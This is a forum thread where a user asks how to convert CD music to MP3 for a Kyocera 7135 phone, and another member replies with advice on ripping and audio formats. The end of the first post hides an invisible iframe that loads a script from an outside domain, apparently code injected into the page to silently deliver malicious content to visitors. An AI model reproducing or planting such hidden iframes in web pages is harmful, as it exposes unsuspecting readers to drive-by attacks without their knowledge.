+ Reply to Thread

Convert CD music to MP3

Please excuse me to post this inappropriate question on this board. I am an old hi-tech idot, and my kids have no patience to teach me. People here are so knowledgeable, I hope someone can teach me how to. Thanks!
    Here is the situation. I want to listen my favorite songs on my 7135 MP3 player. From the manuel I know I need to convert songs into MP3 files before I use the MP3 desktop and the MP3 Ringer-Maker. I have downloaded and installed several recording softwares(Super Sound Recorder, SuperMP3Recorder, All Sound Recorder and ARWizard3). I have tried to make some recording. When I play back the file showing on the application screen, I hear no sound at all. I use the RealOne Player to open and play the file, there is no sound also. I read their help file but I still can't figure out how to record successfully. Anyone please help.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Hi Michael -
    Your post raises a couple of thoughts.
    1, The MP3 player on my Kyo 7135 only plays through the headphone jack. You can get a 2.5MM jack converter to plug deskside

2, The CDAudio files must be converted from something to MP3. Sounds like the software you've selected does that but you may not be using the right format. This is usually called "ripping" the audio track. (so named because folks are "ripping off" the artists by not buying their CDs)

3, IEnsure you have the right MP3 format. I'm happy with a 64kbps, MPEG Layer-3, 22050Hz, 16 bit stereo file. It sounds good and you can get a 5 minute piece into a 2.5Mb .MP3.

Hope this helps.
    In every belief is a lie.

Thanks apressman. I can hear the MP3 now through the phone loudspeaker. I haven't tried the earphone yet because I don't have one. By the way do you think the 7135 loudspeaker sound quality is comparatively worse than other phones? My kids have the Samsung V205. I noticed that their sound of ringtone had much better quality and much louder.